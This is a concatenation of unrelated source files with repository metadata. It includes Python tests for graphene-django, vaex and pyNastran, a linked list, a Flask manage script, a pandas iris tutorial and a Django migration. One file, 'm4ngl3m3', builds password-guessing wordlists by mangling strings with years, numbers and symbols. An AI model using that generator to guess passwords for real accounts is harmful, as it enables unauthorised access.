field = django_field(*args, help_text='Custom Help Text')
graphene_type = convert_django_field(field)
assert isinstance(graphene_type, graphene_field)
assert graphene_type.description == 'Custom Help Text'
return graphene_type
def test_should_unknown_django_field_raise_exception():
with raises(Exception) as excinfo:
convert_django_field(None)
assert 'Don\'t know how to convert the Django field' in str(excinfo.value)
def test_should_date_convert_string():
assert_conversion(models.DateField, graphene.StringField)
def test_should_char_convert_string():
assert_conversion(models.CharField, graphene.StringField)
def test_should_text_convert_string():
assert_conversion(models.TextField, graphene.StringField)
def test_should_email_convert_string():
assert_conversion(models.EmailField, graphene.StringField)
def test_should_slug_convert_string():
assert_conversion(models.SlugField, graphene.StringField)
def test_should_url_convert_string():
assert_conversion(models.URLField, graphene.StringField)
def test_should_auto_convert_id():
assert_conversion(models.AutoField, graphene.IDField)
def test_should_positive_integer_convert_int():
assert_conversion(models.PositiveIntegerField, graphene.IntField)
def test_should_positive_small_convert_int():
assert_conversion(models.PositiveSmallIntegerField, graphene.IntField)
def test_should_small_integer_convert_int():
assert_conversion(models.SmallIntegerField, graphene.IntField)
def test_should_big_integer_convert_int():
assert_conversion(models.BigIntegerField, graphene.IntField)
def test_should_integer_convert_int():
assert_conversion(models.IntegerField, graphene.IntField)
def test_should_boolean_convert_boolean():
field = assert_conversion(models.BooleanField, graphene.BooleanField)
assert field.required is True
def test_should_nullboolean_convert_boolean():
field = assert_conversion(models.NullBooleanField, graphene.BooleanField)
assert field.required is False
def test_should_float_convert_float():
assert_conversion(models.FloatField, graphene.FloatField)
def test_should_manytomany_convert_connectionorlist():
graphene_type = convert_django_field(Reporter._meta.local_many_to_many[0])
assert isinstance(graphene_type, ConnectionOrListField)
assert isinstance(graphene_type.field_type, DjangoModelField)
assert graphene_type.field_type.model == Reporter
def test_should_manytoone_convert_connectionorlist():
graphene_type = convert_django_field(Reporter.articles.related)
assert isinstance(graphene_type, ConnectionOrListField)
assert isinstance(graphene_type.field_type, DjangoModelField)
assert graphene_type.field_type.model == Article
def test_should_onetoone_convert_model():
field = assert_conversion(models.OneToOneField, DjangoModelField, Article)
assert field.model == Article
def test_should_foreignkey_convert_model():
field = assert_conversion(models.ForeignKey, DjangoModelField, Article)
assert field.model == Article
|
[
"me@syrusakbary.com"
] |
me@syrusakbary.com
|
2f961ffd53ac5c591c95cfb96f730b5bb45915e4
|
133e8c9df1d1725d7d34ea4317ae3a15e26e6c66
|
/python/数据结构与算法/02链表/单链表.py
|
9acd2da0cfb6f8e8a747ab11e1d4d6a83f289443
|
[
"Apache-2.0"
] |
permissive
|
425776024/Learn
|
dfa8b53233f019b77b7537cc340fce2a81ff4c3b
|
3990e75b469225ba7b430539ef9a16abe89eb863
|
refs/heads/master
| 2022-12-01T06:46:49.674609
| 2020-06-01T08:17:08
| 2020-06-01T08:17:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,886
|
py
|
# -*- coding: utf-8 -*-
class Node(object):
def __init__(self, value=None, next=None):
# 这里我们 root 节点默认都是 None,所以都给了默认值
self.value = value # 值
self.next = next # 链接域, 指针
def __str__(self):
"""方便你打出来调试,复杂的代码可能需要断点调试"""
return '<Node: value: {}, next={}>'.format(self.value, self.next.value)
__repr__ = __str__
class LinkedList(object):
'''实现一个单向链表.'''
def __init__(self):
''' 初始化链表: 初始化时,为一个空链表.链表有两个标示head和tail都赋值None.'''
self.head = None
self.tail = None
def append(self, data):
'''
向链表新增元素:
1. 如果该链表是一个空链表,则链表head和tail都指向传进来的node节点.
2. 如果链表非空,则self.tail.next = node.next 指向新插入元素.
3. tail指向新插入的元素节点.
'''
node = Node(data)
if self.head is None:
self.head = node
self.tail = node
else:
self.tail.next = node
self.tail = node
def insert(self, index, value):
'''向链表插入一个元素node.
1. 从链表头开始遍历链表,当查找的index小于要插入索引的位置时,依次
指向下一个元素节点.直到找到要插入节点的索引位置.
2. 首先将插入的值,通过Node类实例化一个元素node.然后将它的next指针
指向它的下一个元素.即当前新元素节点之前的元素索引位置.
3. 将当前元素索引指向新插入元素node.
'''
cur = self.head
node = Node(value)
if index == 0:
node.next = self.head
if self.head is None:
self.tail = node
self.head = node
return
cur_index = 0
while cur_index < index - 1:
cur = cur.next
if cur.next is None:
raise Exception('list length less than index')
cur_index += 1
node.next = cur.next
cur.next = node
if cur.next is None:
self.tail = node
def remove(self, index):
'''从链表中删除一个元素节点.
1. 首先找到要删除的元素节点索引.
2. 然后将当前节点的next指向下一个下一个元素节点.
'''
cur = self.head
cur_index = 0
while cur_index < index-1:
cur = cur.next
if cur is None:
raise Exception('list length less than index')
cur_index +=1
cur.next = cur.next.next
if cur.next is None:
self.tail = cur
def removeEle(self, value):
""" 从链表中删除一个值
"""
cur = self.head
head = None
while cur is not None:
if cur.value == value:
if cur is self.head:
_head = cur.next
self.head = _head
if _head is self.tail:
self.tail = _head
del cur
return True
if cur is self.tail:
head.next = None
self.tail = head
del cur
return True
head.next = cur.next
del cur
return True
head = cur
cur = cur.next
return False
def iter(self):
'''
返回一个链表迭代器.
1. 首先判断该链表是否为一个空链表。如果时一个空链表,直接返回.
2. 如果是一个非空链表,首先指针指向head节点,然后将head节点data
返回.然后while循环,条件是下一个指针元素为真.然后弹出下一个元
素data,直到遍历到最后一个元素.
'''
if not self.head:
return
cur = self.head
yield cur.value
while cur.next:
cur = cur.next
yield cur.value
def __iter__(self):
for i in self.iter():
yield i
if __name__ == "__main__":
linked_list = LinkedList()
# 循环插入元素
for i in range(10):
linked_list.append(i)
# 向元素插入一个元素
linked_list.insert(0, 40)
# 向元素删除一个元素
linked_list.remove(4)
linked_list.removeEle(6)
# 遍历该链表
# for node in linked_list.iter():
# print node
# 遍历该链表
for node in linked_list:
print node
|
[
"1248644045@qq.com"
] |
1248644045@qq.com
|
719ec5e11dce6e24bd6b5f91b3469b407c0160a1
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02257/s888628284.py
|
59550bf214754874e7673f5cf26d7edf5cc0ca07
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 321
|
py
|
# -*- coding: utf-8 -*-
def isPrime(p):
if p == 2:
return True
elif p < 2 or p%2 == 0:
return False
elif pow(2, p-1, p) == 1:
return True
else:
return False
n = int(raw_input())
count = 0
for i in range(n):
if isPrime(int(raw_input())):
count += 1
print count
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
ed222c561a8364dd729c7da79f866fc6f3032907
|
8419f7d24df69a2cb92f04d7369c11c8141b0fcd
|
/tests/selection_test.py
|
50d2e7a9e5f36e1495360ba5839de57cc89d17e9
|
[
"MIT"
] |
permissive
|
heyuqi1970/vaex
|
c1768eac9d5126e7efd1e139522feb9d65a7ecc9
|
867c180427a23e3b71df47305d7e8866b6673a98
|
refs/heads/master
| 2021-07-09T08:45:21.634354
| 2020-04-23T17:23:58
| 2020-04-23T17:23:58
| 242,555,084
| 2
| 0
|
MIT
| 2020-04-24T03:40:17
| 2020-02-23T16:54:13
|
Python
|
UTF-8
|
Python
| false
| false
| 6,325
|
py
|
from common import *
def test_selection_basics(df):
total = df["x"].sum()
df.select("x > 5")
df.select("x <= 5", name="inverse")
counts = df.count("x", selection=["default", "inverse", "x > 5", "default | inverse"])
np.testing.assert_array_almost_equal(counts, [4, 6, 4, 10])
df.select("x <= 1", name="inverse", mode="subtract")
counts = df.count("x", selection=["default", "inverse"])
np.testing.assert_array_almost_equal(counts, [4, 4])
total_subset = df["x"].sum(selection=True)
assert total_subset < total
for mode in vaex.selections._select_functions.keys():
df.select("x > 5")
df.select("x > 5", mode)
df.select(None)
df.select("x > 5", mode)
df.select("x > 5")
total_subset = df["x"].sum(selection=True)
df.select_inverse()
total_subset_inverse = df["x"].sum(selection=True)
df.select("x <= 5")
total_subset_inverse_compare = df["x"].sum(selection=True)
assert total_subset_inverse == total_subset_inverse_compare
assert total_subset_inverse + total_subset == total
df.select("x > 5")
df.select("x <= 5", name="inverse")
df.select_inverse(name="inverse")
counts = df.count("x", selection=["default", "inverse"])
np.testing.assert_array_almost_equal(counts, [4, 4])
def test_selection_history(df):
assert not df.has_selection()
assert not df.selection_can_undo()
assert not df.selection_can_redo()
df.select_nothing()
assert not df.has_selection()
assert not df.selection_can_undo()
assert not df.selection_can_redo()
total = df["x"].sum()
assert not df.has_selection()
assert not df.selection_can_undo()
assert not df.selection_can_redo()
df.select("x > 5")
assert df.has_selection()
total_subset = df["x"].sum(selection=True)
assert total_subset < total
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.select("x < 7", mode="and")
total_subset2 = df["x"].sum(selection=True)
assert total_subset2 < total_subset
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.selection_undo()
total_subset_same = df["x"].sum(selection=True)
total_subset == total_subset_same
assert df.selection_can_undo()
assert df.selection_can_redo()
df.selection_redo()
total_subset2_same = df["x"].sum(selection=True)
total_subset2 == total_subset2_same
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.selection_undo()
df.selection_undo()
assert not df.has_selection()
assert not df.selection_can_undo()
assert df.selection_can_redo()
df.selection_redo()
assert df.has_selection()
assert df.selection_can_undo()
assert df.selection_can_redo()
df.select("x < 7", mode="and")
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.select_nothing()
assert not df.has_selection()
assert df.selection_can_undo()
assert not df.selection_can_redo()
df.selection_undo()
assert df.selection_can_undo()
assert df.selection_can_redo()
def test_selection_serialize(df):
selection_expression = vaex.selections.SelectionExpression("x > 5", None, "and")
df.set_selection(selection_expression)
total_subset = df["x"].sum(selection=True)
df.select("x > 5")
total_subset_same = df["x"].sum(selection=True)
assert total_subset == total_subset_same
values = selection_expression.to_dict()
df.set_selection(vaex.selections.selection_from_dict(values))
total_subset_same2 = df["x"].sum(selection=True)
assert total_subset == total_subset_same2
selection_expression = vaex.selections.SelectionExpression("x > 5", None, "and")
selection_lasso = vaex.selections.SelectionLasso("x", "y", [0, 10, 10, 0], [-1, -1, 100, 100], selection_expression, "and")
df.set_selection(selection_lasso)
total_2 = df.sum("x", selection=True)
assert total_2 == total_subset
def test_selection_and_filter():
x = np.arange(-10, 11, 1)
y = np.arange(21)
df = vaex.from_arrays(x=x, y=y)
df.select(df.x < 0)
selected_list = df.evaluate(df.x, selection=True).tolist()
df_filtered = df[df.x < 0]
filtered_list = df_filtered['x'].tolist()
assert filtered_list == selected_list
repr(df_filtered)
# make sure we can slice, and repr
df_sliced = df_filtered[:5]
repr(df_sliced)
def test_filter(df):
dff = df[df.x>4]
assert dff.x.tolist() == list(range(5,10))
# vaex can have filters 'grow'
dff_bigger = dff.filter(dff.x < 3, mode="or")
dff_bigger = dff_bigger.filter(dff_bigger.x >= 0, mode="and") # restore old filter (df_filtered)
assert dff_bigger.x.tolist() == list(range(3)) + list(range(5,10))
def test_filter_boolean_scalar_variable(df):
df = df[df.x>4]
assert df.x.tolist() == list(range(5,10))
df.add_variable("production", True)
df = df.filter("production", mode="or")
df = df[df.x>=0] # restore old filter (df_filtered)
df = df[df.x<10] # restore old filter (df_filtered)
assert df.x.tolist() == list(range(10))
def test_selection_with_filtered_df_invalid_data():
# Custom function to be applied to a filtered DataFrame
def custom_func(x):
assert 4 not in x; return x**2
df = vaex.from_arrays(x=np.arange(10))
df_filtered = df[df.x!=4]
df_filtered.add_function('custom_function', custom_func)
df_filtered['y'] = df_filtered.func.custom_function(df_filtered.x)
# assert df_filtered.y.tolist() == [0, 1, 4, 9, 25, 36, 49, 64, 81]
assert df_filtered.count(df_filtered.y, selection='y > 0') == 8
def test_lasso(df):
x = [-0.1, 5.1, 5.1, -0.1]
y = [-0.1, -0.1, 4.1, 4.1]
df.select_lasso("x", "y", x, y)
sumx, sumy = df.sum(["x", "y"], selection=True)
np.testing.assert_array_almost_equal(sumx, 0+1+2)
np.testing.assert_array_almost_equal(sumy, 0+1+4)
# now test with masked arrays, m ~= x
x = [8-0.1, 9+0.1, 9+0.1, 8-0.1]
y = [-0.1, -0.1, 1000, 1000]
if df.is_local():
df._invalidate_selection_cache()
df.select_lasso("m", "y", x, y)
sumx, sumy = df.sum(['m', 'y'], selection=True)
np.testing.assert_array_almost_equal(sumx, 8)
np.testing.assert_array_almost_equal(sumy, 8**2)
|
[
"maartenbreddels@gmail.com"
] |
maartenbreddels@gmail.com
|
5c187cef52ac8e1006273cd22ea80940f0c1b7d1
|
485ba262357e10460c74482cd407003ac86886bb
|
/pyNastran/converters/openfoam/test_openfoam_gui.py
|
0d93a5f9986ab459a658b741ae5694fddee65246
|
[] |
no_license
|
shangke00GitHub/pyNastran
|
13202f3f504dca044755088971176a407622425b
|
c4509df6ef6c3291c005caada831b443feee734f
|
refs/heads/master
| 2020-11-30T02:45:48.774507
| 2019-12-20T00:56:25
| 2019-12-20T00:56:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,090
|
py
|
import os
import unittest
from cpylog import get_logger
import pyNastran
from pyNastran.gui.testing_methods import FakeGUIMethods
from pyNastran.converters.openfoam.block_mesh import read_block_mesh, mirror_block_mesh
from pyNastran.converters.openfoam.face_file import FaceFile
from pyNastran.converters.openfoam.openfoam_io import OpenFoamIO
from pyNastran.utils import check_path
PKG_PATH = pyNastran.__path__[0]
MODEL_PATH = os.path.join(PKG_PATH, 'converters', 'openfoam', 'models')
class OpenFoamGUI(OpenFoamIO, FakeGUIMethods):
def __init__(self):
FakeGUIMethods.__init__(self)
self.model = OpenFoamIO(self)
self.build_fmts(['openfoam_hex', 'openfoam_shell', 'openfoam_faces'], stop_on_failure=True)
class TestOpenFoamGUI(unittest.TestCase):
def test_openfoam_geometry_01(self):
"""tests the ascii three plugs model"""
log = get_logger(level='warning', encoding='utf-8')
geometry_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'blockMeshDict')
bdf_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'blockMeshDict.bdf')
face_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'faces')
check_path(geometry_filename, 'geometry_filename')
test = OpenFoamGUI()
test.log = log
test.on_load_geometry(geometry_filename, geometry_format='openfoam_shell', raise_error=True)
test.on_load_geometry(geometry_filename, geometry_format='openfoam_hex', raise_error=True)
os.remove('points.bdf')
#test.load_openfoam_geometry_faces(geometry_filename)
model = read_block_mesh(geometry_filename, log=log)
block_mesh_name_out = 'blockMeshDict.out'
model.write_block_mesh(
block_mesh_name_out=block_mesh_name_out, make_symmetry=False)
model.write_block_mesh(
block_mesh_name_out=block_mesh_name_out, make_symmetry=True)
model.write_bdf(bdf_filename, model.nodes, model.hexas)
mirror_block_mesh(geometry_filename, block_mesh_name_out)
os.remove(block_mesh_name_out)
#nodes, hexas, quads, inames, bcs
def test_openfoam_2(self):
point_filename = 'points'
with open(point_filename, 'w') as point_file:
point_file.write('0. 0. 0.\n')
face_filename = 'faces'
with open(face_filename, 'w') as face_file:
face_file.write('2\n')
face_file.write('\n')
face_file.write('3 1 2 3\n')
face_file.write('3 1 3 4\n')
log = get_logger(level='warning', encoding='utf-8')
#test = OpenFoamGUI()
#test.log = log
#test.load_openfoam_faces_geometry(face_filename)
faces = FaceFile(log=None, debug=False)
faces.read_face_file(face_filename)
faces.read_face_file(face_filename, ifaces_to_read=[1])
faces.read_face_file(face_filename, ifaces_to_read=[0, 1])
os.remove(point_filename)
os.remove(face_filename)
if __name__ == '__main__': # pragma: no cover
unittest.main()
|
[
"mesheb82@gmail.com"
] |
mesheb82@gmail.com
|
1df490347f6ba150e4c18eda8adb09b65cfd0cbd
|
7ca50753ed3ff4c6115f8be3de675c91631c382f
|
/manage.py
|
8c8509f5ee95dfc01cb27aa14ab0dd2c753db751
|
[] |
no_license
|
harrywang/flask-tdd-docker
|
a63ca86062dc05ab99591ef4ce609d90868f6e77
|
2677c52ae8dba84695d032fd309ee864f7fb2521
|
refs/heads/master
| 2023-05-11T15:44:04.689565
| 2020-03-21T20:00:57
| 2020-03-21T20:00:57
| 248,801,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 565
|
py
|
# manage.py
import sys
from flask.cli import FlaskGroup
from project import create_app, db
from project.api.users.models import User
app = create_app()
cli = FlaskGroup(create_app=create_app)
@cli.command('recreate_db')
def recreate_db():
db.drop_all()
db.create_all()
db.session.commit()
@cli.command('seed_db')
def seed_db():
db.session.add(User(username='michael', email="hermanmu@gmail.com"))
db.session.add(User(username='michaelherman', email="michael@mherman.org"))
db.session.commit()
if __name__ == '__main__':
cli()
|
[
"harryjwang@gmail.com"
] |
harryjwang@gmail.com
|
561a473b6aa704f7d0651d89278fc1942b376384
|
b3528a3795ce373e27d52362128de3cff6f9969d
|
/python/orbs/target/password-generator/slices1589360571.263371/success/success_39_0.py
|
f1896f56cc09413b60c95ec2ce3c24bce6dab1fd
|
[] |
no_license
|
greenmonn/daily-coding
|
43e0f3775678c7d6116df7ba5034ea18489d87c9
|
ef6ecc88e6db61e18364eef3ea071c11e1385a99
|
refs/heads/master
| 2023-01-14T04:59:14.130309
| 2021-02-08T23:32:56
| 2021-02-08T23:32:56
| 157,735,438
| 1
| 1
| null | 2022-12-21T02:13:17
| 2018-11-15T15:47:37
|
Python
|
UTF-8
|
Python
| false
| false
| 5,253
|
py
|
#!/usr/bin/env python3
# m4ngl3m3! v0.1.1
# Common password pattern generator using strings list
# Follow (Medium / Twitter): @localh0t
import argparse
import sys
import os
from Mangler import ManglingParameters
from Mangler import Mangler
def build_parser():
"""Add parser arguments and return an instance of ArgumentParser."""
parser = argparse.ArgumentParser(description=("Common password pattern "
"generator using strings "
"list"),
formatter_class=argparse.
ArgumentDefaultsHelpFormatter)
parser.add_argument("mutation_mode",
metavar="MUTATION_MODE",
type=str,
help=("Mutation mode to perform: "
"(prefix-mode | suffix-mode | dual-mode)"),
choices=['prefix-mode', 'suffix-mode', 'dual-mode'])
parser.add_argument("strings_file",
metavar="STRINGS_FILE",
type=str,
help="File with strings to mutate")
parser.add_argument("output_file",
metavar="OUTPUT_FILE",
type=str,
help="Where to write the mutated strings")
parser.add_argument("-fy", "--from-year",
metavar="FROM_YEAR",
type=int,
help="Year where our iteration starts",
default=2015)
parser.add_argument("-ty", "--to-year",
metavar="TO_YEAR",
type=int,
help="Year where our iteration ends",
default=2020)
parser.add_argument('-sy', "--short-year",
help=("Also add shorter year form when iterating"),
action='store_true',
default=False)
parser.add_argument("-nf", "--numbers-file",
metavar="NUMBERS_FILE",
type=str,
help="Numbers prefix/suffix file",
default='./target/password-generator/files/numbers/numbers_set2.txt')
parser.add_argument("-sf", "--symbols-file",
metavar="SYMBOLS_FILE",
type=str,
help="Symbols prefix/suffix file",
default='./target/password-generator/files/symbols/symbols_set2.txt')
parser.add_argument("-cf", "--custom-file",
metavar="CUSTOM_FILE",
type=str,
help="Custom words/dates/initials/etc file")
parser.add_argument('-sbs', "--symbols-before-suffix",
help=("Insert symbols also before years/numbers/"
"custom (when in suffix-mode or dual-mode)"),
action='store_true',
default=False)
parser.add_argument('-sap', "--symbols-after-prefix",
help=("Insert symbols also after years/numbers/custom"
" (when in prefix-mode or dual-mode)"),
action='store_true',
default=False)
parser.add_argument("-mm", "--mutation-methods",
metavar="MUTATION_METHODS",
default='normal,'
'uppercase,'
'firstup,'
'replacevowels')
return parser
def build_mangler_with_args(args):
parameters = ManglingParameters()
parameters.num_file = open(args.numbers_file, 'r').read().splitlines()
parameters.sym_file = open(args.symbols_file, 'r').read().splitlines()
if (args.custom_file):
parameters.cus_file = open(args.custom_file, 'r').read().splitlines()
parameters.mutation_mode = args.mutation_mode
parameters.from_year = args.from_year
parameters.to_year = args.to_year
parameters.suffix_pos_swap = args.symbols_before_suffix
return Mangler(mangling_parameters=parameters)
if __name__ == "__main__":
args = build_parser().parse_args()
mangler = build_mangler_with_args(args)
mangler_functions = {
"normal": mangler.normal_mangling,
"uppercase": mangler.uppercase_mangling,
"firstup": mangler.firstup_mangling,
"replacevowels": mangler.replacevowels_mangling,
}
written_strings = 0
with open(args.strings_file, 'r') as f:
for line in f:
mangled = []
for method in args.mutation_methods.lower().split(","):
try:
(name, output) = mangler_functions[method](line.strip())
mangled.extend(output)
except KeyError:
print("[-] The method %s is not defined !" % method)
print("[+] %s mutation method done on string: %s" %
(name, line.strip()))
written_strings += len(mangled)
print('##v_trajectory captured: {}##'.format(written_strings))
|
[
"greenmon@kaist.ac.kr"
] |
greenmon@kaist.ac.kr
|
e382659fe44a65b3a060e2c0d9cb78015fd0bea2
|
28436c3e8d5f59f9011bfac7fcdef977c345aa7b
|
/2021-05-15/homework1.py
|
960425e000fa70c2621ff185c6e2e587beb46b6b
|
[] |
no_license
|
engeeker/python-for-kid-2021
|
533d7b54ef23d99727642ba7a119e0a46577651b
|
783d3582c6e9009c23213378650160f7dc937409
|
refs/heads/main
| 2023-08-02T15:18:17.367567
| 2021-10-01T13:15:56
| 2021-10-01T13:15:56
| 347,414,400
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 252
|
py
|
import turtle
import random
p = turtle.Pen()
color_list = ['red', 'yellow', 'blue', 'green']
p.speed(0)
turtle.bgcolor('black')
p.color(random.choice(color_list))
for i in range(200):
p.forward(i * 2)
p.left(91)
turtle.Screen().exitonclick()
|
[
"xiaoquwl@gmail.com"
] |
xiaoquwl@gmail.com
|
804b7d2aeaf690de61b0b87bbb40796c12287a2a
|
dfaf5cd5607c2c4e55ec9173d2d7ca12842db129
|
/104_findDiagonalOrder.py
|
add0e471b6091ea711a6ab960ca377f92f09bd77
|
[] |
no_license
|
khinthandarkyaw98/Leetcode
|
2b0be053931b3ddec6309d136228dae1f4c61b2b
|
578f2a38d8a41864ebfd6c4e941f6915c7c0a508
|
refs/heads/master
| 2023-06-24T02:34:59.399319
| 2021-07-14T19:37:14
| 2021-07-14T19:37:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 488
|
py
|
import collections
class Solution:
def findDiagonalOrder(self, nums: List[List[int]]) -> List[int]:
res = []
q = collections.deque()
q.append((0,0))
while q:
row, col = q.popleft()
if col == 0 and row < len(nums)-1:
q.append((row + 1, col))
if col< len(nums[row])-1:
q.append((row, col+1))
res.append(nums[row][col])
return res
|
[
"noreply@github.com"
] |
khinthandarkyaw98.noreply@github.com
|
be4a4e2c0ee32b41a05520c16e30dac4c1106efe
|
922e923bdab099efa7161f5806ed262ba5cc84c4
|
/apps/documents/migrations/0006_boardmeetingaudio_boardmeetingvideo.py
|
22c1e2091ad36ddb3047bb2b82dd82b211ce2165
|
[
"MIT"
] |
permissive
|
iamjdcollins/districtwebsite
|
eadd45a7bf49a43e6497f68a361329f93c41f117
|
89e2aea47ca3d221665bc23586a4374421be5800
|
refs/heads/master
| 2021-07-05T19:06:12.458608
| 2019-02-20T17:10:10
| 2019-02-20T17:10:10
| 109,855,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,722
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-12-11 17:04
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('objects', '0005_auto_20171210_1447'),
('documents', '0005_boardmeetingagenda_boardmeetingminutes'),
]
operations = [
migrations.CreateModel(
name='BoardMeetingAudio',
fields=[
('title', models.CharField(max_length=200)),
('boardmeetingaudio_document_node', models.OneToOneField(db_column='boardmeetingaudio_document_node', editable=False, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='objects.Document')),
('related_node', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='documents_boardmeetingaudio_node', to='objects.Node')),
],
options={
'permissions': (('trash_boardmeetingaudio', 'Can soft delete board meeting audio'), ('restore_boardmeetingaudio', 'Can restore board meeting audio')),
'verbose_name_plural': 'Board Meeting Audio',
'default_manager_name': 'objects',
'db_table': 'documents_boardmeetingaudio',
'get_latest_by': 'update_date',
'verbose_name': 'Board Meeting Audio',
},
bases=('objects.document',),
),
migrations.CreateModel(
name='BoardMeetingVideo',
fields=[
('title', models.CharField(max_length=200)),
('boardmeetingvideo_document_node', models.OneToOneField(db_column='boardmeetingvideo_document_node', editable=False, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='objects.Document')),
('related_node', models.ForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='documents_boardmeetingvideo_node', to='objects.Node')),
],
options={
'permissions': (('trash_boardmeetingvideo', 'Can soft delete board meeting video'), ('restore_boardmeetingvideo', 'Can restore board meeting video')),
'verbose_name_plural': 'Board Meeting Videos',
'default_manager_name': 'objects',
'db_table': 'documents_boardmeetingvideo',
'get_latest_by': 'update_date',
'verbose_name': 'Board Meeting Video',
},
bases=('objects.document',),
),
]
|
[
"jd@iamjdcollins.com"
] |
jd@iamjdcollins.com
|
71420c46e794fbf9129e80cd832982ba3453f560
|
c0836fbc0d26ec5b4fbef8b116536ee1573a63e3
|
/1_basic/2_pandas/pandas_15.py
|
c103bccdeca3d2290f5bb6aabbc243f1cc9500b8
|
[] |
no_license
|
SungmanHan/machineLearningStudy
|
5e4c2869351cceddb6cd212323c4a710a97984cc
|
36854f946252158b2cdb18b6842f0c905d0811b1
|
refs/heads/master
| 2020-07-12T21:21:18.126845
| 2019-09-25T13:23:50
| 2019-09-25T13:23:50
| 204,908,533
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,567
|
py
|
# -*- coding: utf-8 -*-
import pandas as pd
# 사이킷 런의 sklearn.datasets 패키지 내부의
# 학습 데이터를 로딩하는 코드
# (load_... 이름으로 함수가 정의되어 있음)
from sklearn.datasets import load_iris
# iris 데이터를 로딩하는 코드
iris_data = load_iris()
# Bunch 클래스 타입의 값이 반환
# 파이썬의 딕셔너리와 유사한 타입으로
# 키값을 사용하여 데이터를 추출할 수 있음
print(type(iris_data))
# Bunch 클래스 keys 메소드
# 사용할 수 있는 키의 목록을 반환하는 메소드
print(iris_data.keys())
# 키 값 'data' 는 특성 데이터를 반환
# (numpy 2차원 배열의 형태)
print(iris_data['data'])
print(iris_data.data)
print(type(iris_data.data))
# pandas 데이터 프레임으로
# 특성 데이터를 저장
X_df = pd.DataFrame(iris_data.data)
# Bunch 클래스의 타입의 feature_names 키 값을
# 사용하여 데이터프레임의 헤더를 설정
X_df.columns = iris_data.feature_names
# iris 데이터의 샘플 개수 및 결측데이터 확인
print(X_df.info())
# iris 데이터의 수치 데이터 통계 확인
print(X_df.describe())
# 라벨 데이터의 데이터프레임 생성
# 키 값 'target' 은 라벨 데이터를 반환
# (numpy 1차원 배열의 형태)
y_df = pd.Series(iris_data.target)
# 데이터의 확인
# 사이킷 런에서 제공되는 데이터들은
# 전처리가 완료된 상태의 데이터이므로
# 문자열이 아닌 수치 데이터가 제공됨
print(y_df)
# 라벨 데이터의 분포 확인
print(y_df.value_counts())
print(y_df.value_counts() / len(y_df))
# 특성 데이터와 라벨 데이터의 결합
all_df = pd.concat([X_df, y_df], axis=1)
# pandas 옵션을 사용하여 화면에 출력할
# 최대 컬럼 개수를 조정
pd.options.display.max_columns = 10
print(all_df)
# 데이터 프레임 내부의 특성 간 상관관계를
# 분석하여 반환하는 메소드 - corr()
corr_df = all_df.corr()
# 결과(라벨) 데이터와 특성 데이터들간의
# 상관관계를 출력
# 1에 가까울수록 강한 양의 상관관계를 보여줌
# (라벨 데이터의 수치가 커질수록 특성 데이터의
# 값이 증가)
# 0에 가까울수록 약한 상관관계를 보여줌
# (특성 데이터의 수치 변화가 특성 데이터와 관계없음)
# -1에 가까울수록 강한 음의 상관관계를 보여줌
# (특성 데이터의 수치가 커질수록 특성 데이터의
# 값이 감소)
print(corr_df)
print(iris_data.target_names)
|
[
"hansung926@gmail.com"
] |
hansung926@gmail.com
|
8edae035598a6bff9f6a7325d526abfd07cb3fab
|
e5ba55ac56d2d07aeebd7253fbe5d186196c9a52
|
/catkin_ws/catkin_ws/build/iai_kinect2/kinect2_registration/catkin_generated/pkg.installspace.context.pc.py
|
85e878c71d08a7cf827ee4e610db3258f4e5642e
|
[] |
no_license
|
masiro97/darrsm
|
5305a3e7c1fba2635a4925b9e079f45b40162862
|
b881d00427d2af5d75ca509a191e57f2890e1ece
|
refs/heads/master
| 2021-05-10T21:57:17.760536
| 2018-01-20T15:13:56
| 2018-01-20T15:13:56
| 111,084,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 605
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/cun/catkin_ws/install/include;/usr/include".split(';') if "/home/cun/catkin_ws/install/include;/usr/include" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lkinect2_registration;-l:/usr/lib/x86_64-linux-gnu/libOpenCL.so".split(';') if "-lkinect2_registration;-l:/usr/lib/x86_64-linux-gnu/libOpenCL.so" != "" else []
PROJECT_NAME = "kinect2_registration"
PROJECT_SPACE_DIR = "/home/cun/catkin_ws/install"
PROJECT_VERSION = "0.0.1"
|
[
"estrk7120@gmail.com"
] |
estrk7120@gmail.com
|
542816beffb8b703f3ac06dfc3663090ffee2d00
|
